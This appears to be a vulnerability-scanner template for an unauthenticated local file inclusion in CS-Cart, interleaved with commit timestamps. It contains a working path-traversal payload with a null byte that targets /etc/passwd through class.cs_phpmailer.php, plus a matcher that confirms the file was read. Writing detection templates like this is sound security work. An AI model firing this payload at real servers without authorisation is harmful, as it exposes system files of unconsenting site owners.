2021-09-21 22:36:57 +00:00
id : cs-cart-unauthenticated-lfi
info :
2022-07-26 13:45:11 +00:00
name : CS-Cart - Local File Inclusion
2021-09-21 22:36:57 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : CS-Cart is vulnerable to local file inclusion because it allows remote unauthenticated attackers to access locally stored files and reveal their content.
2022-04-22 10:38:41 +00:00
reference :
- https://cxsecurity.com/issue/WLB-2020100100
2022-07-26 13:45:11 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2021-09-21 22:36:57 +00:00
tags : cscart,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
2021-09-22 12:38:32 +00:00
- "root:.*:0:0:"
2021-09-21 22:36:57 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22